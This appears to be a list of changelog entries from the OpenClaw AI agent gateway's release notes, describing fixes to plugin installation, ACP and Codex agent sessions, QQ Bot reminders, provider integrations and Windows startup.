<li>QQ Bot: make <code>qqbot_remind</code> schedule, list, and remove Gateway cron jobs directly for owner-authorized senders instead of returning <code>cronParams</code> and relying on a follow-up generic <code>cron</code> tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4319867451" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70865" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70865/hovercard" href="https://github.com/openclaw/openclaw/issues/70865">#70865</a>. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4320478556" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70937" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/70937/hovercard" href="https://github.com/openclaw/openclaw/pull/70937">#70937</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/GaosCode/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/GaosCode">@GaosCode</a>.</li>
<li>Agents/ACP: hide <code>sessions_spawn</code> ACP runtime options unless an ACP backend is loaded, and make <code>/acp doctor</code> call out <code>plugins.allow</code> blocking bundled <code>acpx</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/Codex: keep ACP prompt/skill routing hidden unless an ACP runtime backend is available, and warn in doctor when enabled Codex plugin configs still route <code>openai-codex/*</code> models through PI. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Media delivery: avoid sending generated image attachments twice when the assistant reply already includes explicit <code>MEDIA:</code> lines for the same turn, and reject unsafe remote <code>MEDIA:</code> URLs before delivery. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Codex harness: ignore retryable app-server error notifications after Codex recovers, and preserve the real nested error message for terminal app-server failures instead of replacing it with a generic failure. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pashpashpash/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pashpashpash">@pashpashpash</a>.</li>
<li>Agents/Codex: prepare native Codex sub-agent session metadata without a nested Gateway session patch and add a focused Docker smoke for the app-server sub-agent path. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Agents/subagents: keep queued subagent announces session-only when the requester has no external channel target, avoiding ambiguous multi-channel delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4189037839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59201" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59201/hovercard" href="https://github.com/openclaw/openclaw/issues/59201">#59201</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/larrylhollan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/larrylhollan">@larrylhollan</a>.</li>
<li>Image understanding: preserve configured provider-prefixed vision model metadata when callers request the model without the provider prefix, so custom image models keep their <code>input: ["text", "image"]</code> capability. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4017340728" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/33185" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/33185/hovercard" href="https://github.com/openclaw/openclaw/issues/33185">#33185</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Kobe9312/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Kobe9312">@Kobe9312</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Plugins/install: restore the previous plugin index records if a concurrent config write conflict interrupts install, update, or uninstall metadata commits. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: reject native plugin archives that do not include a valid <code>openclaw.plugin.json</code>, preventing manifestless archives from writing install records that later show missing-manifest diagnostics. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/uninstall: remove tracked managed plugin install directories even when the persisted install path differs from the default id-derived target, while still refusing deletes outside the managed extensions root. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/update: restore previous plugin index records if core update or channel setup hits a concurrent config write conflict after plugin metadata changes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/onboarding: defer channel/provider plugin install records until the owning config write commits, keeping setup failures from advancing the plugin index ahead of <code>openclaw.json</code>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: route configure and agent setup writes with pending plugin install records through the plugin index commit helper so provider onboarding metadata is not stripped by plain config writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/channels: merge pending channel plugin install records with the existing plugin index before config writes, preserving unrelated tracked installs during channel setup, resolve, remove, and capability repair flows. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/config: defer shipped <code>plugins.installs</code> index migration during config writes until the guarded config commit window and roll it back if the config write fails before commit. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Sessions: keep embedded runtime context out of the visible user prompt by sending it as a hidden next-turn custom message, and teach doctor to repair affected 2026.4.24 transcripts with duplicated prompt-rewrite branches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329177517" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71761" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71761/hovercard" href="https://github.com/openclaw/openclaw/issues/71761">#71761</a>.</li>
<li>Gateway/subagents: keep direct-loopback backend RPCs authenticated with the shared gateway token/password off stale CLI paired-device scope baselines, so internal calls no longer hit <code>scope-upgrade</code> pairing prompts while remote, browser, node, device-token, and explicit-device paths still require normal pairing approval. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4229478808" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63548" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63548/hovercard" href="https://github.com/openclaw/openclaw/issues/63548">#63548</a>.</li>
<li>Providers/Azure OpenAI: give deployment-scoped image generation requests a longer 600s default timeout so slow <code>gpt-image-2</code> generations can complete without a per-call <code>timeoutMs</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328916892" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71705" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71705/hovercard" href="https://github.com/openclaw/openclaw/issues/71705">#71705</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/voytas75/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/voytas75">@voytas75</a>.</li>
<li>Gateway/plugins: link source-checkout bundled runtime dependency caches instead of recursively copying <code>node_modules</code> on the gateway main thread, preventing local status, node, and skill probes from timing out during startup cache restores.</li>
<li>Skills/remote nodes: only expose remote macOS skill bins for connected nodes, clear stale bin matches when node probes fail, and include probe command, timeout, bin count, and connection state in timeout logs.</li>
<li>Skills/remote nodes: recognize <code>system.which</code> object-map responses when probing connected macOS nodes, so Linux gateways can expose macOS-only skills such as Apple Notes when the required binaries are installed remotely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329760105" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71877/hovercard" href="https://github.com/openclaw/openclaw/issues/71877">#71877</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/miguelarios/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/miguelarios">@miguelarios</a>.</li>
<li>CLI/gateway: keep diagnostic probes from creating first-time read-only device pairings, while still reusing cached device tokens for detailed read probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329202027" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71766" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71766/hovercard" href="https://github.com/openclaw/openclaw/issues/71766">#71766</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SunboZ/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SunboZ">@SunboZ</a>.</li>
<li>CLI/plugins: keep <code>message</code> startup, <code>channels logs</code>, <code>agents delete</code>, and <code>agents set-identity</code> off broad plugin preloading; message delivery still loads plugins when the action actually runs.</li>
<li>Image understanding: resolve configured image models such as local LM Studio vision entries before reporting <code>Unknown model</code> when the discovery registry has not registered that provider. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261396872" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66486" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66486/hovercard" href="https://github.com/openclaw/openclaw/issues/66486">#66486</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zhanggpcsu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zhanggpcsu">@zhanggpcsu</a>.</li>
<li>QQ Bot: ignore self-echoed bot messages using the outbound ref-index marker, preventing mirrored replies from re-entering the agent loop while still allowing users to quote bot replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329883097" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71912" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71912/hovercard" href="https://github.com/openclaw/openclaw/issues/71912">#71912</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wangyc6003/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wangyc6003">@wangyc6003</a>.</li>
<li>Sessions: separate reset freshness from session-store <code>updatedAt</code>, so heartbeat, cron, exec, and gateway bookkeeping no longer prevent configured daily/idle resets from rolling long-running channel sessions. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4285740424" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68315" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68315/hovercard" href="https://github.com/openclaw/openclaw/issues/68315">#68315</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4232177002" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63732/hovercard" href="https://github.com/openclaw/openclaw/issues/63732">#63732</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4233422936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63820/hovercard" href="https://github.com/openclaw/openclaw/issues/63820">#63820</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4291872905" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69083" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69083/hovercard" href="https://github.com/openclaw/openclaw/issues/69083">#69083</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/maxatv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/maxatv">@maxatv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/longhairedsi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/longhairedsi">@longhairedsi</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bradfreels/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bradfreels">@bradfreels</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/akessel56/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/akessel56">@akessel56</a>.</li>
<li>Sessions: clear queued system-event notices during <code>/new</code>, <code>/reset</code>, gateway <code>sessions.reset</code>, and daily/idle rollover so stale background updates cannot leak into the first prompt of the fresh session. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4265262942" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66864" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66864/hovercard" href="https://github.com/openclaw/openclaw/issues/66864">#66864</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/opeyio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/opeyio">@opeyio</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Magicray1217/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Magicray1217">@Magicray1217</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cedillarack/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cedillarack">@cedillarack</a>.</li>
<li>CLI/agents: keep <code>agents bind</code>, <code>agents unbind</code>, and <code>agents bindings</code> on setup-safe channel metadata paths so they do not preload bundled plugin runtimes or stage runtime dependencies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329103021" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71743" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71743/hovercard" href="https://github.com/openclaw/openclaw/issues/71743">#71743</a>.</li>
<li>Plugins/registry: preserve explicit disabled plugin records during registry migration without persisting every unused bundled plugin discovered on disk. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Windows/native: keep CLI startup and bundled provider plugin loading off Windows ESM raw-path failure paths, fixing native onboarding/install smoke on Node 24.</li>
<li>Plugins/doctor: read bundled channel doctor capabilities through the same packaged plugin directory resolver used by plugin loading, so published installs keep Matrix DM allowlist repairs on <code>channels.matrix.dm.*</code> instead of writing invalid top-level <code>dmPolicy</code> keys. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329162302" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71757" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71757/hovercard" href="https://github.com/openclaw/openclaw/issues/71757">#71757</a>.</li>
<li>Plugins/Windows: keep bundled plugin Jiti loaders off the native import path on Windows so channel plugins such as Telegram no longer crash with <code>ERR_UNSUPPORTED_ESM_URL_SCHEME</code> on <code>C:\...</code> paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329134759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71749" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71749/hovercard" href="https://github.com/openclaw/openclaw/issues/71749">#71749</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/smeyer9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/smeyer9">@smeyer9</a>.</li>
<li>Providers/Ollama: use Ollama's current <code>/api/web_search</code> endpoint and honor <code>https://ollama.com</code> model-provider base URLs for Ollama Web Search. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329095399" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71741" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71741/hovercard" href="https://github.com/openclaw/openclaw/issues/71741">#71741</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/madhvidua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/madhvidua">@madhvidua</a>.</li>
<li>Memory/Ollama: serialize Ollama memory embedding batches and add an inline batch timeout override, with longer defaults for local/self-hosted embedding providers.</li>
<li>Sessions/usage: exclude compaction checkpoint transcript snapshots from usage totals and session discovery, while keeping old checkpoint files removable.</li>
<li>CLI/agents: keep <code>openclaw agents list --json</code> on the config-only path by default, avoiding bundled plugin loading unless callers request <code>--bindings</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329088196" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71739" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71739/hovercard" href="https://github.com/openclaw/openclaw/issues/71739">#71739</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kaloster/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kaloster">@kaloster</a>.</li>
<li>Plugins/install: force plugin dependency installs to stay project-local even when inherited npm config requests global installs, so successful installs still materialize the plugin's staged <code>node_modules</code>.</li>
<li>Providers/Google: transcode Gemini TTS PCM to Opus for voice-note targets so WhatsApp and other native voice-note replies can play as voice messages.</li>
<li>TTS/WhatsApp: mark non-Opus provider output as voice-note intent so channel delivery transcodes MP3/WebM replies to Ogg/Opus PTT audio.</li>
<li>Plugins/runtime deps: reuse existing external bundled-plugin stage roots when mirrored plugin roots are inspected again, avoiding second-generation <code>openclaw-unknown-*</code> stages and repeated first-turn restaging. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328214258" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71599/hovercard" href="https://github.com/openclaw/openclaw/issues/71599">#71599</a>.</li>
<li>iOS/macOS Talk Mode: allow <code>talk.speechLocale</code> to set the speech recognition locale for non-English voice conversations. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4069022882" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44688" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44688/hovercard" href="https://github.com/openclaw/openclaw/issues/44688">#44688</a>.</li>
<li>Plugins/providers: honor explicit plugin candidate lists instead of reading a persisted registry snapshot from local state, keeping candidate-scoped provider discovery hermetic.</li>
<li>Plugins/doctor: keep bundled plugin runtime-dependency repairs inside the managed OpenClaw stage even when user npm prefix/global config points npm at <code>$HOME/node_modules</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>ACP/sessions_spawn: reject normal OpenClaw config agent ids when callers explicitly request <code>runtime="acp"</code>, while allowing agents configured with <code>runtime.type="acp"</code> to resolve to their ACP harness id. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4234724919" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63914" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63914/hovercard" href="https://github.com/openclaw/openclaw/issues/63914">#63914</a>.</li>
<li>ACP/sessions_spawn: apply <code>runTimeoutSeconds</code> to ACP child turns and dispatch those turns on the background subagent lane, so quota-stalled ACP harnesses do not occupy the main agent lane indefinitely. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289936854" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68823" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68823/hovercard" href="https://github.com/openclaw/openclaw/issues/68823">#68823</a>.</li>
<li>ACP/oneshot: reconcile runtime session identity before closing completed oneshot ACP runs, so finished <code>sessions.json</code> entries do not stay stuck with <code>acp.identity.state="pending"</code>.</li>
<li>ACPX: bundle <code>acpx@0.6.1</code> so unsupported generic model overrides fail clearly instead of silently falling back to the target adapter default.</li>
<li>ACP/models: document that non-Codex ACP model overrides require adapter support for ACP <code>models</code> plus <code>session/set_model</code>, so unsupported harnesses fail clearly instead of silently falling back to their defaults.</li>
<li>Plugins/Voice Call: treat missing provider credentials as setup-incomplete during Gateway startup and log the missing keys as a warning instead of a runtime startup error, while keeping explicit command/tool errors when used.</li>
<li>Android/Talk Mode: prevent duplicate TTS playback when fast or repeated final chat events arrive while Talk Mode is waiting for its own response. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4076624751" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/46546" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/46546/hovercard" href="https://github.com/openclaw/openclaw/issues/46546">#46546</a>.</li>
<li>Tooling/check:changed: pass parent heavy-check lock markers to lint lanes so <code>pnpm check:changed</code> no longer waits on its own <code>lint:extensions</code> child.</li>
<li>CLI/completion: dedupe provider auth flags before registering <code>openclaw onboard</code> options, so completion-cache refresh during update no longer fails when stale core fallback flags overlap plugin manifest flags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4328717666" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71667" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71667/hovercard" href="https://github.com/openclaw/openclaw/issues/71667">#71667</a>.</li>
<li>Diagnostics/trace: report live context usage from the current prompt snapshot instead of provider turn totals, avoiding false near-full context spikes on cached or tool-heavy runs.</li>
<li>Providers/Google: honor <code>models.providers.google.request.allowPrivateNetwork</code> for Gemini TTS and telephony TTS, matching Google image generation and media understanding. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329016945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71723" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/71723/hovercard" href="https://github.com/openclaw/openclaw/pull/71723">#71723</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ro-hansolo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ro-hansolo">@ro-hansolo</a>.</li>
<li>Providers/MiniMax: register <code>minimax-portal</code> for music and video generation, preserving OAuth auth and regional MiniMax base URLs across the shared <code>music_generate</code> and <code>video_generate</code> tools. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4226014254" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63241" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/63241/hovercard" href="https://github.com/openclaw/openclaw/pull/63241">#63241</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tars90percent/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tars90percent">@tars90percent</a>.</li>
<li>Providers/onboarding: keep Runway and Alibaba Model Studio out of the text-inference setup picker by scoping their video-generation auth choices to the media setup flow. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253432057" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65856" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65856/hovercard" href="https://github.com/openclaw/openclaw/pull/65856">#65856</a>) Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>.</li>
<li>Plugins/Bonjour: stop the gateway from crash-looping on <code>CIAO PROBING CANCELLED</code> when the mDNS watchdog cancels a stuck probe. Restores the rejection-handler wiring dropped during the bonjour plugin migration and shares unhandled-rejection state across module instances so plugin-staged copies of <code>openclaw/plugin-sdk/runtime</code> register into the same handler set the host consults. Especially affects Docker on macOS, where mDNS probing reliably hits the watchdog. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/troyhitch/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/troyhitch">@troyhitch</a>.</li>
<li>Google Meet: report pinned Chrome nodes as offline or missing capabilities in setup/join diagnostics, keep inaccessible nodes out of auto-selection, and preflight local BlackHole/SoX requirements before agents try local Chrome.</li>
<li>Providers/MiniMax: route <code>image-01</code> requests to the dedicated image generation endpoint while preserving CN endpoint selection. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206267950" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61149" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61149/hovercard" href="https://github.com/openclaw/openclaw/issues/61149">#61149</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mushuiyu886/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mushuiyu886">@mushuiyu886</a>.</li>
<li>Plugins/startup: remove ownerless bundled runtime-dependency install locks after a short grace window and include lock owner details when startup times out waiting for a plugin runtime-deps lock.</li>
<li>Plugins/install: anchor bundled runtime-dependency npm installs with an OpenClaw-owned package manifest so Linux updates cannot accidentally write to a parent <code>$HOME/node_modules</code> tree. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4329067622" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/71730" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/71730/hovercard" href="https://github.com/openclaw/openclaw/issues/71730">#71730</a>.</li>
<li>Plugins/install: pass onboarding plugin config into plugin index writes so local plugin installs outside default discovery roots keep their install records. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: migrate shipped <code>plugins.installs</code> config records into the plugin index while stripping them from runtime config and future writes. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: durably remove shipped <code>plugins.installs</code> from <code>openclaw.json</code> after its records are copied into the plugin index, while rolling back the index write if config cleanup fails. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/install: keep migrated plugin install records in the plugin index even when the plugin manifest is missing or invalid, so update, uninstall, inspect, and audit can still recover broken installs. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>Plugins/security: keep plugin audit JSON check ids stable while reporting plugin index install-record findings with updated wording. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
<li>CLI/config: reject direct <code>plugins.installs</code> edits with guidance to use <code>openclaw plugins install</code>, <code>openclaw plugins update</code>, or <code>openclaw plugins uninstall</code> instead. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</li>
